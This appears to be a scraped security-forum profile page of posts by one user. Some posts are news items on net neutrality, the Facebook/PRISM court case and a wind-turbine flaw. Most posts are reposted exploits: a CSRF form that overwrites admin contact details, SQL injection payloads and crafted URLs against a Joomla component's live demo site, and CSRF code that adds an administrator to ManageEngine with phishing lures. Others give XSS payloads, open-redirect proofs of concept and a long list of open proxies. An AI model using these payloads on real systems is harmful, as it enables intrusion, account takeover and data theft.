width="6%"><input name="show" type="radio" value="y" checked></td> <td width="13%">Yes</td> <td width="5%"><input type="radio" name="show" value="n"></td> <td width="76%">No</td> </tr> </table></td> </tr> <tr> <td bgcolor="E8EEF3"> <strong> Category Image:</strong></td> <td bgcolor="E8EEF3"><input name="bFile" type="file" class="txtfilefield1" id="bFile"> 70 x 62 px</td> </tr> <tr> <td bgcolor="E8EEF3"> </td> <td bgcolor="E8EEF3"><input type="image" src="img/addmain_section.jpg" width="121" height="24"></td> </tr> </form> </table></td> </tr> </table></td> </tr> <tr> ---------------------------------------------------------- Change Contact Details PoC ---------------------------------------------------------- <form name="form1" method="post" action="http://[TARGET]/admincp/updcontact.php" > <input type="hidden" name="cid" value="1"> <table align=center width=525> <tr style="background-color:#B0B0B0; font-family:verdana; font-size:11; font-weight:bold; color:white"> <td height="25" colspan=3><div align="center">Change your Contact Detail:</div></td> </tr> <tr> <td width="35%"> </td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%" height="25" bgcolor="#CCCCCC"> First Contact Person:</td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">Contact Person:</td> <td width="75%"> <input name=cp1 type=text id="cp1" value="HACKER"></td> <td width="16"> </td> </tr> <tr> <td width="35%">Designation:</td> <td width="75%"> <input name=cpd1 type=text id="cpd1" value="HACKER"></td> <td> </td> </tr> <tr> <td width="35%">Mobile:</td> <td width="75%"> <input name=cpm1 type=text id="cpm1" value="HACKER"></td> <td> </td> </tr> <tr> <td width="35%" height="25" bgcolor="#CCCCCC"> Second Contact Person:</td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">Contact Person:</td> <td width="75%"> <input name=cp2 type=text id="cp2" value=""></td> <td> </td> </tr> <tr> <td width="35%">Designation:</td> <td width="75%"> <input name=cpd2 type=text id="cpd2" value=""></td> <td> </td> </tr> <tr> <td width="35%">Mobile:</td> <td width="75%"> <input name=cpm2 type=text id="cpm2" value=""></td> <td> </td> </tr> <tr> <td width="35%" height="25" bgcolor="#CCCCCC"> Third Contact Person:</td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">Contact Person:</td> <td width="75%"> <input name=cp3 type=text id="cp3" value=""></td> <td> </td> </tr> <tr> <td width="35%">Designation:</td> <td width="75%"> <input name=cpd3 type=text id="cpd3" value=""></td> <td> </td> </tr> <tr> <td width="35%">Mobile:</td> <td width="75%"> <input name=cpm3 type=text id="cpm3" value=""></td> <td> </td> </tr> <tr> <td width="35%"> </td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">Phone I:</td> <td width="75%"> <input name=ph1 type=text id="ph1" value="HACKER"></td> <td> </td> </tr> <tr> <td width="35%">Phone II:</td> <td width="75%"> <input name=ph2 type=text id="ph2" value=""></td> <td> </td> </tr> <tr> <td width="35%">Phone III:</td> <td width="75%"> <input name=ph3 type=text id="ph3" value=""></td> <td> </td> </tr> <tr> <td width="35%"> </td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">Fax I:</td> <td width="75%"> <input name=fax1 type=text id="fax1" value="HACKER"></td> <td> </td> </tr> <tr> <td width="35%"> </td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">E - Mail I:</td> <td width="75%"> <input name=email1 type=text id="email1" value="HACKER"></td> <td> </td> </tr> <tr> <td width="35%">E - Mail II:</td> <td width="75%"> <input name=email2 type=text id="email2" value=""></td> <td> </td> </tr> <tr> <td width="35%">E - Mail II:</td> <td width="75%"> <input name=email3 type=text id="email3" value=""></td> <td> </td> </tr> <tr> <td width="35%"> </td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">Web Site:</td> <td width="75%"> <input name=web type=text id="web" value="HACKER"></td> <td> </td> </tr> <tr> <td> </td> <td> </td> <td> </td> </tr> <tr> <td>Skype:</td> <td><input name=skype type=text id="skype" value=""></td> <td> </td> </tr> <tr> <td>Yahoo:</td> <td><input name=yahoo type=text id="yahoo" value=""></td> <td> </td> </tr> <tr> <td>gTalk:</td> <td><input name=gtalk type=text id="gtalk" value=""></td> <td> </td> </tr> <tr> <td>MSN:</td> <td><input name=msn type=text id="msn" value=""></td> <td> </td> </tr> <tr> <td> </td> <td> </td> <td> </td> </tr> <tr> <td width="35%"><div><strong>Asia Head Office Address:</strong></div> <br></td> <td width="75%"> <textarea name=haddress cols=38 rows=4 id="haddress" >HACKER</textarea></td> <td> </td> </tr> <tr> <td width="35%"><strong>Hong Kong Office Address:</strong> </td> <td width="75%"> <textarea name=faddress cols=38 rows=4 id="faddress" ></textarea></td> <td> </td> </tr> <tr> <td><strong>Australian Office Address:</strong></td> <td><textarea name=fax2 cols=38 rows=4 id="fax2" ></textarea></td> <td> </td> </tr> <tr> <td width="35%"> </td> <td width="75%"> <input type="submit" name="Submit" value="Submit"> <input name="reset" type="reset" id="reset" value="Reset"></td> <td> </td> </tr> </table> </form> Source
  13. Aerosol
    @zonamea eu ti-am dat un exemplu de aici te descurci. ( e interesanta faza ca la unele domenii te trimite pe google. )
  14. Aerosol
    # Affected software: google website # Type of vulnerability: redirect vulnerability # URL: www.google.com # Discovered by: moni hbh # Proof of concept https://www.google.com/search?q=www.facebook.com&btnI= & https://www.google.ro/search?source=www.facebook.com&hl=www.facebook.com&q=www.facebook.com&btnG=www.facebook.com&btnI=www.facebook.com #Work to all .com / .ro / .ru etc. reply from : security@google.com Concluzie sunteti liberi sa va "jucati"
  15. Aerosol
    36.250.74.87:80 183.207.224.45:80 123.58.129.48:80 183.207.224.50:81 183.207.224.43:80 42.51.132.239:8080 119.6.144.74:81 36.250.74.87:8103 120.198.243.86:80 163.177.79.5:8101 120.198.243.118:80 211.144.81.68:18000 124.88.67.34:80 183.207.224.51:82 88.150.136.179:3128 131.109.42.105:80 114.249.36.220:8118 119.97.164.48:8085 124.88.67.6:81 120.237.30.178:8080 183.207.224.44:80 163.177.79.5:80 88.150.136.180:3129 183.207.224.50:85 202.108.23.247:80 183.207.228.56:80 220.181.32.106:80 221.10.102.203:81 120.198.243.113:80 185.28.193.95:8080 211.144.81.69:18000 183.203.22.106:80 37.59.176.38:7808 120.198.243.115:8083 123.125.104.240:80 115.239.210.199:80 101.71.27.120:80 120.198.243.151:80 120.198.243.115:98 183.207.224.51:83 124.88.67.10:80 202.108.50.75:80 101.71.27.120:80 178.156.202.153:8089 111.161.126.99:80 122.96.59.106:81 61.53.134.140:9797 113.107.57.76:3128 221.10.102.203:83 183.207.224.13:80 120.198.243.114:80 163.177.79.4:80 221.10.102.203:80 122.225.117.26:80 218.59.144.120:81 120.197.234.166:80 111.161.126.100:80 221.10.102.203:843 120.198.243.53:80 120.198.243.54:80 202.107.233.85:8080 120.198.243.51:80 202.106.16.36:3128 120.198.243.48:80 119.6.144.74:82 121.14.138.56:81 183.131.144.204:443 120.198.243.79:80 210.14.152.121:8090 59.58.162.141:888 120.198.243.50:80 107.182.17.149:8089 183.207.237.18:81 114.215.108.155:9999 113.142.37.248:80 120.131.129.227:80 101.251.211.235:80 120.198.243.115:8089 101.95.144.66:80 88.150.136.180:3128 54.161.139.184:5555 124.88.67.33:843 120.198.243.14:80 88.150.136.181:3128 181.88.177.145:8080 183.224.1.30:80 120.131.128.212:80 178.32.22.85:8123 114.252.247.22:8118 183.207.228.58:80 183.207.224.14:80 202.102.22.182:80 111.13.109.52:80 120.198.243.115:8082 124.88.67.84:80 36.250.74.88:8103 124.88.67.13:843 183.207.228.116:80 183.207.224.51:84 120.131.128.213:80 222.134.69.195:8080 115.231.96.120:80 202.114.144.15:8088 183.207.228.22:80 202.106.169.142:80 218.206.83.89:80 183.207.224.50:80 86.107.110.73:7808 124.88.67.13:80 123.125.104.242:80 210.101.131.227:8080 111.13.136.59:843 200.41.224.86:6588 88.150.136.178:3128 120.198.243.82:80 218.59.144.95:80 122.94.141.26:8118 120.198.243.115:80 183.131.144.204:80 14.18.234.131:82 58.253.238.243:80 60.18.147.42:80 183.207.224.51:80 107.182.17.9:8089 124.88.67.6:80 221.181.73.45:80 218.59.144.120:80 176.31.84.249:7808 121.10.252.139:3128 183.207.228.57:80 111.206.50.177:80 183.207.228.114:80 101.4.136.34:9999 120.198.243.115:80 120.237.30.178:9000 58.253.238.242:80 61.156.3.166:80 120.198.243.15:80 183.207.228.60:80 36.250.74.88:80 120.198.243.52:80 101.4.136.66:80 111.206.81.248:80 111.161.126.101:80 183.207.228.54:80 183.207.228.54:83 163.177.79.4:8101 178.156.202.153:7808 221.5.69.51:80 37.53.83.30:3128 183.207.237.11:80 120.198.243.78:80 193.109.166.219:3128 120.237.30.178:808 61.53.143.179:80 120.237.30.178:808 120.203.148.6:8118 221.12.173.130:3128 183.207.237.18:80 107.182.17.149:7808 120.198.243.130:80 107.182.17.9:7808 120.198.243.115:8080 111.161.126.98:80 111.11.153.19:80 124.88.67.81:80 125.39.66.68:80 124.161.94.8:80 120.236.148.113:3128 183.203.208.174:8118 112.232.96.47:8118 200.41.224.86:6588 122.136.46.151:3128 113.107.57.76:80 117.135.251.74:80 202.119.25.227:9999 111.161.126.101:80 61.154.127.136:10001 61.184.192.42:80 163.177.79.4:8102 183.207.229.146:80 111.13.136.59:80 182.254.129.68:80 106.37.177.251:3128 122.96.59.106:83 79.140.220.243:3128 111.11.153.19:80 190.166.56.211:80 116.236.216.116:8080 183.203.208.167:8001 124.88.67.83:80 122.96.59.106:82 85.214.87.52:3128 119.6.144.74:83 120.198.243.116:80 218.4.236.117:80 183.203.8.148:8080 218.59.144.95:81 120.198.243.115:8000 120.237.30.178:5050 125.62.22.47:9999 83.87.252.83:80 199.200.120.37:8089 199.200.120.36:7808 183.221.53.190:8123 61.54.221.200:3128 199.200.120.36:8089 183.207.228.51:80 36.250.74.88:8101 183.203.208.172:8118 122.225.106.40:80 125.39.66.66:80 124.202.178.22:8118 124.202.177.26:8118 188.64.171.40:3128 211.141.130.186:8118 124.202.179.150:8118 111.13.12.202:80 122.96.59.106:843 183.203.208.194:8001 111.192.23.118:8118 183.207.237.18:81 125.39.66.67:80 183.207.228.115:80 111.13.55.3:22 123.184.17.192:80 113.250.103.210:8118 111.13.136.58:80 120.131.128.211:80 222.45.196.53:8118 222.45.85.210:8118 124.88.67.24:80 147.83.143.44:80 89.169.0.122:8080 218.90.174.167:3128 176.31.84.249:8089 31.15.48.12:80 183.136.135.153:8080 117.21.192.10:80 82.192.30.253:8080 183.203.208.176:8001 37.49.137.243:3128 117.21.192.10:80 183.207.228.50:81 167.114.144.14:3128 62.153.96.164:80 61.54.221.200:3128 112.22.245.232:8123 202.75.214.11:80 39.191.51.232:8123 219.142.192.196:4887 175.43.20.95:80 183.221.187.196:8123 183.221.185.163:8123 122.136.46.151:80 61.232.6.164:8081 202.75.216.235:80 211.141.130.245:8118 183.221.184.233:8123 119.6.144.74:80 120.131.128.214:80 183.203.208.173:8001 202.29.97.6:3128 183.203.208.194:8001 46.229.138.186:3128 202.101.96.154:8888 211.141.133.100:8118 85.154.230.162:3128 23.96.16.159:80 219.142.192.196:1591 219.142.192.196:177 58.252.72.179:3128 211.141.130.96:8118 124.202.169.102:8118 27.251.94.1:3128 117.21.192.9:80 182.92.176.174:8080 124.202.169.102:8001 93.189.221.26:8080 93.189.221.26:8080 137.135.166.225:8118 210.101.131.231:8080 124.202.169.98:8001 119.28.3.200:83 202.4.105.138:8080 183.203.22.76:80 210.101.131.232:8080 36.250.69.4:80 188.165.223.173:8116 183.203.208.163:8118 186.233.116.90:80 219.142.192.196:193 200.41.231.10:8080 188.132.226.2:80 182.92.64.30:8080 113.69.86.192:9000 182.92.240.197:8080 177.99.173.26:3128 182.118.23.7:8081 209.20.78.169:3128 190.40.123.35:8080 122.96.59.106:80 222.45.196.46:8118 64.76.23.186:80 200.108.35.60:8081 115.28.85.240:8088 202.29.235.130:3129 183.203.208.170:8001 210.200.13.232:80 5.135.163.64:13227 5.135.163.64:29094 178.33.252.74:60088 178.33.252.74:29062 101.81.142.152:1080 101.81.142.152:28759 95.50.218.84:80 95.50.218.84:23643 113.99.172.180:1080 113.99.172.180:29045 176.104.99.180:1080 176.104.99.180:29045 178.124.165.170:1080 178.124.165.170:27134 202.22.195.193:1080 202.22.195.193:28609 198.1.108.235:60088 198.1.108.235:28683 113.61.111.196:60088 113.61.111.196:28833 3.7.169.20:3 200.98.239.131:443 98.86.140.29:69 200.98.239.131:25193 109.227.255.21:443 109.227.255.21:22942 69.147.252.172:443 69.147.252.172:22091 178.214.207.68:443 178.214.207.68:22123 103.19.180.10:443 103.19.180.10:25226 199.201.126.67:443 199.201.126.67:25757 183.131.144.204:443 183.131.144.204:28752 199.201.126.163:443 199.201.126.163:27165 198.50.206.1:443 198.50.206.1:27542 104.131.164.79:443 104.131.164.79:29014 58.26.144.71:8080 175.136.195.53:8080 213.136.72.193:3128 88.64.138.170:80 92.222.46.207:3128 80.86.91.94:8080 46.38.243.211:80 176.9.188.186:3128 85.214.61.202:3128 178.18.25.151:8888 84.104.8.117:80 77.174.177.238:8118 83.87.253.5:80 178.32.22.85:8123 37.59.176.38:8089 5.135.193.216:8089 176.31.21.245:3128 195.154.7.6:80 37.59.176.38:7808 5.135.193.216:7808 37.122.202.103:80 94.23.23.60:80 188.165.223.173:8125 94.23.59.45:3128 62.210.97.100:3128 188.165.223.173:8148 Link : Pastebin.com
  16. Aerosol
    US broadband providers have filed legal challenges to new net neutrality rules. The claims, brought by the broadband industry trade group USTelecom and Texas-based provider Alamo Broadband Inc, are the first in what is expected to be a series of legal challenges. USTelecom said the planned rules were misguided, but it did not object to "open internet" laws per se. The US Federal Communications Commission (FCC) called the legal challenges "premature". The FCC recently agreed a set of rules that would enshrine net neutrality - the principle that internet access cannot be blocked or slowed in favour of services that pay for so-called fast lanes - in US law. But USTelecom said the rules, under which internet service providers would be defined as public utilities and more heavily regulated, were "arbitrary, capricious, and an abuse of discretion" and violated various US laws, regulations and rulemaking procedures. The industry body's president, Walter McCormick, said its members supported the enactment of "open internet" principles into law, but not using the new regulatory regime chosen by the FCC. "We do not believe the Federal Communications Commission's move to utility-style regulation... is legally sustainable," he said. USTelecom's case was brought in the US Court of Appeals for the District of Columbia, which has rejected net neutrality regulations proposed by the FCC twice already. Alamo challenged the new rules in the US Court of Appeals for the Fifth Circuit in New Orleans, making a similar argument to that made by USTelecom. Challenges According to the Reuters news agency, industry sources have previously said USTelecom and two other trade groups - CTIA - The Wireless Association, which represents the wireless communications industry, and the National Cable and Telecommunications Association, which acts for the US cable television industry - were expected to lead legal challenges. Verizon Communications Inc, which won a 2010 case against the FCC, was unlikely to mount its own legal challenge this time around, an industry source familiar with Verizon's plan told the agency. The FCC said the legal challenges were "premature and subject to dismissal." Officials added they had been prepared for legal action and the new rules were on much firmer legal ground than previous iterations. The FCC's rules have yet to be published in the Federal Register and formally go into effect. USTelecom, in its legal action, said it had filed the challenge on Monday in case the rules were construed to be final on the date of issue. Priority access In a blogpost, the Center for Boundless Innovation in Technology - a free-market group - said the FCC's net neutrality rules were ideological and removed from the "real internet... [where] congestion is commonplace and the interests of content owners are divergent". It referred to a Wall Street Journal report that major streaming networks were already seeking to separate their services from the public internet in search of higher speeds. In Europe, regulators have also proposed allowing services other than those used to access the public internet a fast lane if they require a higher quality connection to function. However, they sought to avoid a detrimental effect on the quality of service to internet users. Source
  17. Aerosol
    The European Court of Justice (ECJ) has begun hearing evidence in a case relating to Facebook, PRISM and the ownership of online data that could have far-reaching consequences for data protection and EU-US relations. The case was passed to the ECJ by the Irish courts last summer after Austrian privacy campaigner Max Schrems brought a claim against Facebook saying that it had passed information on users to the US National Security Agency (NSA). The allegations came to light as part of the fallout from the PRISM campaign that was leaked by NSA whistleblower Edward Snowden. Schrems argues that Facebook passing on data from European citizens contravenes ‘safe harbour’ principles that should keep such data in the EU. “Large internet companies (in the current case Facebook) have, pursuant to US law, allowed the US government to access European user data on a mass scale for law enforcement, espionage and anti-terror purposes,” he wrote on the Europe-vs-Facebook page set up to cover the trial. “Aiding these forms of US ‘mass surveillance’ may, however, violate EU privacy laws and fundamental rights.” Specifically the problem is that the safe harbour safeguards require US companies to 'self-certify' that data will be protected when taken outside the US. This system has always been criticised, and the PRISM revelations have only proved these fears correct in the eyes of campaigners like Schrems. "Under EU law such a 'data export' to a third country is only legal if the exporting company (in this case Facebook Ireland Ltd) can ensure an 'adequate protection' for such data in the US," Schrems said in his European Court of Justice hears NSA/PRISM case document (PDF). "In the current case, the plaintiff claims that the NSA’s PRISM programme and other forms of US surveillance are the exact antithesis of 'adequate protection'." The case was referred to the ECJ after a judge in Ireland said there was a requirement for the EU to rule on whether Facebook’s actions were in breach of the law. "The monitoring of global communications - subject, of course, to key safeguards - is accordingly regarded essential if the US is to discharge the mandate which it has assumed," said Judge Desmond Hogan last year. "But there may also be suspicion in some quarters that this type of surveillance has had collateral objects and effects, including the preservation and reinforcing of American global political and economic power." Facebook is the company involved in this case, but the outcome will have far-reaching consequences for the relationship between US technology companies with a major presence in Europe, such as Microsoft and Google. If the ECJ sides with Schrems it could see the entire safe harbour agreement thrown out and new rules brought in to give European citizens more privacy and protection from US authorities. This will, in turn, cause tension between the US security agencies and US technology firms, as data from these companies is key to surveillance operations. The US is already attempting to force Microsoft to hand over data stored on servers overseas, claiming that as a US company it is still subject to US laws, even when operating outside the country. If this challenge proves successful there will be even less protection for EU citizens to keep their data secure, although it could also open the market for European cloud providers to offer services without US interference. Source
  18. Aerosol
    It had to happen, we suppose: since even a utility-grade wind turbine might ship with a handy Webby control interface, someone was bound to do it badly. That's what's emerged in a new ICS-CERT advisory: CVE-2015-0985 details how turbines from US manufacturer XZERES allow the user name and password to be retrieved from the company's 442 SR turbine. As the advisory notes, “This exploit can cause a loss of power for all attached systems”. The turbine in question is, according to the company, “deployed across the energy sector” worldwide. It's part of a range of smaller-scale turbines from XZERES. The bug itself is basic: “The 442SR OS recognises both the POST and GET methods for data input,” the advisory states. “By using the GET method, an attacker may retrieve the username password from the browser and will allow the default user password to be changed. The default user has admin rights to the entire system.” Further, the bug is a cinch to exploit: “Crafting a working exploit for this vulnerability would be easy. There is no public exploit for this exact vulnerability. However, code exists online that can be easily modified to initiate a CSRF with this vulnerability.” As always, users of the wind turbine are advised to keep the kit behind firewalls and only allow remote access over a VPN. XZERES has issued a manual patch for the vulnerability. Source
  19. Aerosol
    WordPress AB Google Map Travel CSRF / XSS WordPress Ajax Search Pro Remote Code Execution WordPress InBoundio Marketing Shell Upload WordPress MP3-Jplayer 2.1 Local File Disclosure
  20. Aerosol
    ################################################################################################## #Exploit Title : Joomla Spider FAQ component SQL Injection vulnerability #Author : Manish Kishan Tanwar AKA error1046 #Vendor Link : http://demo.web-dorado.com/spider-faq.html #Date : 21/03/2015 #Discovered at : IndiShell Lab #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi #Discovered At : Indishell Lab ################################################################################################## //////////////////////// /// Overview: //////////////////////// joomla component Spider FAQ is not filtering data in theme and Itemid parameters and hence affected from SQL injection vulnerability /////////////////////////////// // Vulnerability Description: /////////////////////////////// vulnerability is due to theme and Itemid parameter //////////////// /// POC //// /////////////// POC image=http://oi57.tinypic.com/2rh1zk7.jpg SQL Injection in theme parameter ================================= Use error based double query injection with theme parameter Like error based double query injection for exploiting username ---> and(select 1 FROM(select count(*),concat((select (select concat(user(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- - Injected Link---> http://website.com/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=4 and(select 1 FROM(select count(*),concat((select (select concat(user(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- - &searchform=1&expand=0&Itemid=109 SQL Injection in Itemid parameter ================================= Itemid Parameter is exploitable using xpath injection User extraction payload ------------------------ ' AND EXTRACTVALUE(6678,CONCAT(0x7e,(SELECT user() LIMIT 0,1),0x7e))-- - crafted URL---> http://demo.web-dorado.com/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=4&searchform=1&expand=0&Itemid=109' AND EXTRACTVALUE(6678,CONCAT(0x7e,(SELECT user() LIMIT 0,1),0x7e))-- - Table extraction ----------------- ' and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e))-- - Crafted URL----> http://demo.web-dorado.com/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=4&searchform=1&expand=0&Itemid=109' and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e))-- - --==[[ Greetz To ]]==-- ############################################################################################ #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, #Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA, #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash ############################################################################################# --==[[Love to]]==-- # My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, #Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik) --==[[ Special Fuck goes to ]]==-- <3 suriya Cyber Tyson <3 Source
  21. Aerosol
    =============================================================================== CSRF to add admin user Vulnerability In Manage Engine Device Expert =============================================================================== . contents:: Table Of Content Overview ======== * Title : CSRF to add admin user Vulnerability In Manage Engine Device Expert * Author: Kaustubh G. Padwad * Plugin Homepage: http://www.manageengine.com/products/device-expert/ * Severity: HIGH * Version Affected: Version 5.9.9.0 Build: 5990 * Version Tested : Version 5.9.9.0 Build: 5990 * version patched: Separate Patch release for all version Description =========== About the Product ================= DeviceExpert is a web–based, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control of the entire life cycle of device configuration management. Vulnerable Parameter -------------------- Create user form About Vulnerability ------------------- This Cross-Site Request Forgery vulnerability enables an anonymous attacker to add an admin account into the application. This leads to compromising the whole domain as the application normally uses privileged domain account to perform administration tasks. Vulnerability Class =================== Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) ========================= * Add follwing code to webserver and send that malicious link to application Admin. * The admin should be loggedin when he clicks on the link. * Soical enginering might help here For Example :- Device password has been changed click here to reset ####################CSRF COde####################### <html> <body> <form action="https://Server-IP:6060/STATE_ID/1423516534014/CreateUser.ve" method="POST"> <input type="hidden" name="loginName" value="hackerkaustubh" /> <input type="hidden" name="password" value="kaustubh" /> <input type="hidden" name="confirmpass" value="kaustubh" /> <input type="hidden" name="emailaddress" value="kingkaustubh@me.com" /> <input type="hidden" name="SEND_EMAIL" value="true" /> <input type="hidden" name="roles" value="Administrator" /> <input type="hidden" name="ComponentSelection" value="SpecificDevice" /> <input type="hidden" name="searchfield" value="--Search Devices--" /> <input type="hidden" name="DEVICEGROUPSELECTION" value="1" /> <input type="hidden" name="DeviceGroupDescription"/> value="This device group contains all the devices present in the inventory" /> <input type="hidden" name="QUERYID" value="-1" /> <input type="submit" value="Submit request" /> </form> </body> </html> Mitigation ========== Receved from manage engine team https://uploads.zohocorp.com/Internal_Useruploads/dnd/NetFlow_Analyzer/o_19ga51p951gblpbs1rkrm211vim1/vulnerabilities_Fix.zip Open DeviceExper.zip 1. Stop the Device Expert service. 2. Please replace AdvNCM.jar under DeviceExpert_Home/lib with the one under DeviceExpert.zip/AdvNCM.jar 3. Start the Device Expert service Change Log ========== Disclosure ========== 11-February-2015 Reported to Developer 13-February-2015 Acknodlagement from Developer 13-March-2015 Fixed by developer 16-March-2015 Requested a cve ID 21-March-2015 Public Disclosed credits ======= * Kaustubh Padwad * Information Security Researcher * kingkaustubh@me.com * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad Source
  22. Aerosol
    =============================================================================== Stored XSS Vulnerability In Manage Engine Device Expert =============================================================================== . contents:: Table Of Content Overview ======== * Title :Stored XSS Vulnerability In Manage Engine Device Expert * Author: Kaustubh G. Padwad * Plugin Homepage: http://www.manageengine.com/products/device-expert/ * Severity: HIGH * Version Affected: Version 5.9.9.0 Build: 5990 * Version Tested : Version 5.9.9.0 Build: 5990 * version patched: Separate Patch release for all version Description =========== About the Product ================= DeviceExpert is a web–based, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control of the entire life cycle of device configuration management. Vulnerable Parameter -------------------- * Login Name About Vulnerability ------------------- This Product is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can execute arbitrary code into Admin manage console. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. Vulnerability Class =================== Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) ========================= 1. After Setting up Manage engine Login to manage engine Device expert 2. Navigate to admin-->User Management-->New User 3.Put this Payload into Login Name 4.Fill the other details #####payload To Use####################### <BODY ONLOAD=alert('Hacked_ByS3curity_B3ast')> ########################################## 5. Click Save to See Stored XSS in action 6. Reload Pages to see it many times you want 7. Same can be done By CSRF also . image:: stoerdXSS.jpeg :height: 1000 px :width: 1000 px :scale: 100 % :alt: XSS POC :align: center Mitigation ========== Receved from manage engine team https://uploads.zohocorp.com/Internal_Useruploads/dnd/NetFlow_Analyzer/o_19ga51p951gblpbs1rkrm211vim1/vulnerabilities_Fix.zip Open DeviceExper.zip 1. Stop the Device Expert service. 2. Please replace AdvNCM.jar under DeviceExpert_Home/lib with the one under DeviceExpert.zip/AdvNCM.jar 3. Start the Device Expert service Change Log ========== Disclosure ========== 11-February-2015 Reported to Developer 13-February-2015 Acknodlagement from Developer 13-March-2015 Fixed by developer 16-March-2015 Requested a cve ID 21-March-2015 Public Disclosed credits ======= * Kaustubh Padwad * Information Security Researcher * kingkaustubh@me.com * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad Source
  23. Aerosol
    Title:- Cross-Site Request Forgery (CSRF) Vulnerability in ManageEngine Network Configuration Management Author: Kaustubh G. Padwad Vendor: ZOHO Corp Product: ManageEngine Network Configuration Manager Tested Version: : Network Configuration Manager Build 11000 Severity: HIGH About the Product: ================== Network Configuration Manager is a web–based, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, Network Configuration Manager helps automate and take total control of the entire life cycle of device configuration management. Description: ============ This Cross-Site Request Forgery vulnerability enables an anonymous attacker to add an device into the application. and device fileds are vulnerable to cross site scripting attack This leads to compromising the whole domain as the application. Vulnerability Class: ==================== Cross-Site Request Forgery (CSRF) - https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29 Cross-Site-Scripting How to Reproduce: (POC): ======================== * Add follwing code to webserver and send that malicious link to application Admin. * The admin should be loggedin when he clicks on the link. ( Soical enginering might help here * For Example :- Device password has been changed click here to reset CSRF COde ========= <body> <form action="http://192.168.1.80:8080/ncmapi/json/settings/addDevice?apiKey=3566c4f7a30732ad4e17a9659c38ba03" method="POST"> <input type="hidden" name="IPADDRESS" value="192.168.1.1" /> <input type="hidden" name="SERIES" value="<script>alert("1")</script>" /> <input type="hidden" name="MODEL" value="<script>alert("1")</script>" /> <input type="hidden" name="COLUMNNAME1" value="<script>alert("1")</script>" /> <input type="hidden" name="COLUMNNAME2" value="<script>alert("1")</script>" /> <input type="hidden" name="VENDOR_NAME" value="3Com" /> <input type="hidden" name="DEVICE_BEHAVIOUR" value="3Com 4200G Series Switch" /> <input type="submit" value="Submit request" /> </form> </body> </html> Mitigation ========== Download and unzip the fix from the below link: https://uploads.zohocorp.com/Internal_Useruploads/dnd/NetFlow_Analyzer/o_19ga51p951gblpbs1rkrm211vim1/vulnerabilities_Fix.zip NCM.zip 1. Stop the Network Configuration Manager service. 2. Please replace settingModel.js under NCM_Home\webapps\netflow\ncmapiclient\ember\models\Settings\settingModel.js with with one under NCM.zip\settingModel.js. 3. Please replace AdvNCM.jar and main.js under NCM_Home\webapps\netflow\ncmapiclient\ember\javascript with the one under NCM.zip Disclosure: =========== 04-Mar-2015 Repoerted to vendor 13-Mar-2015 Fixed By Vendor 16-Mar-2015 Requested for CVE ID 21-Mar-2015 Public Disclosed #credits: Kaustubh Padwad Information Security Researcher kingkaustubh@me.com https://twitter.com/s3curityb3ast http://breakthesec.com https://www.linkedin.com/in/kaustubhpadwad Kaustubh Padwad Information Security Researcher kingkaustubh@me.com https://twitter.com/s3curityb3ast http://breakthesec.com https://www.linkedin.com/in/kaustubhpadwad Source
  24. Aerosol
    # Affected software: kunstmaan cms # Type of vulnerability: redirect vulnerability # URL: bundles.kunstmaan.be # Discovered by: Provensec # Website: http://www.provensec.com #version: not specified on domain # Proof of concept http://demo.bundles.kunstmaan.be/en/admin/media/delete/9?redirectUrl=http://google.com Source
  25. Aerosol
